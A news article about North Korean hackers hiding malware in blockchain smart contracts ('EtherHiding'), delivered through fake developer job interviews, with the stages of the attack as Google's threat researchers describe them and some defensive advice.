North Korean state-backed hackers have adopted a new tactic—embedding malicious code within blockchain smart contracts—to conduct sophisticated cyberattacks that steal credentials and cryptocurrency. Researchers say the innovation, dubbed EtherHiding, complicates global cybersecurity efforts by merging digital espionage with decentralized finance infrastructure.
A New Kind of Cyberweapon
In February, Google’s Threat Intelligence Group (GTIG) began tracking a wave of cyberattacks linked to a North Korean state-sponsored group identified internally as UNC5342. The operation, nicknamed “Contagious Interview,” disguised itself as a series of legitimate job interviews for software developers and blockchain engineers.
What made these attacks unusual was not their social engineering, a known tactic in North Korean cyber operations, but their delivery system. Instead of hosting malicious payloads on compromised servers or dark web forums, the hackers used smart contracts—self-executing programs on public blockchains like Ethereum and Binance Smart Chain—to store and distribute their malware.
GTIG’s researchers say this method, known as EtherHiding, has only recently emerged in the cyber threat landscape. By embedding code within smart contracts, hackers exploit blockchain transparency for anonymity—weaponizing the very openness that underpins decentralized technology.
Weaponizing the Blockchain
First described by Guardio Labs in 2023, EtherHiding enables threat actors to conceal malware inside blockchain transactions. Once deployed, the code can be fetched through read-only calls that leave no visible traces in transaction histories. The result is an attack surface nearly impossible to take down or trace.
“The low cost and frequency of these updates illustrate the attacker’s ability to easily change the campaign’s configuration,” GTIG researchers noted. Updating malicious smart contracts costs just over a dollar in gas fees, allowing hackers to modify payloads repeatedly without detection.
Because blockchain data cannot be easily erased or censored, law enforcement faces new challenges in containing such threats. “It’s the first time we’ve observed a state-backed hacker group leveraging this method,” one researcher said, calling it a “notable escalation” in cyber-espionage techniques.
Only Two Weeks Left: FCRF Invites Enrolment for Certified Cyber Law Practitioner (CCLP) Program
Fake Jobs, Real Espionage
Investigators say the attacks typically begin with fabricated job listings posted under names like BlockNovas LLC or Angeloper Agency—front companies created to lure skilled developers. Candidates are asked to complete “technical assessments” that secretly execute JavaScript downloaders, which then fetch encrypted payloads via the blockchain.
The malicious chain unfolds in stages: an initial downloader retrieves a component named JADESNOW, which communicates with Ethereum to extract further payloads, including a credential-stealing module that targets passwords, credit cards, and crypto wallets like MetaMask and Phantom.
GTIG’s analysis found that the malware can also receive instructions from command-and-control servers or Telegram, exfiltrating stolen data in ZIP files. The combination of traditional espionage tactics and blockchain infrastructure represents, experts say, a new hybrid of state-sponsored hacking.
A Warning for the Digital Economy
The use of blockchain technology for covert cyber operations blurs the line between financial systems and national security. GTIG suggests that administrators impose download restrictions on risky file types such as .EXE, .MSI, and .DLL, and enforce strict browser and script policies, particularly on enterprise networks.
Researchers also noted that some payloads run entirely in memory, further complicating detection. The use of multiple blockchains, including Ethereum and the BNB Smart Chain, may point to internal compartmentalization among North Korean hacking units—a level of operational sophistication rarely seen outside major cyber powers.
As digital assets continue to merge with global finance, experts warn that EtherHiding may be only the beginning. By embedding malware within immutable code, attackers are effectively hiding in plain sight—turning the blockchain’s greatest strength into a new frontier of vulnerability.
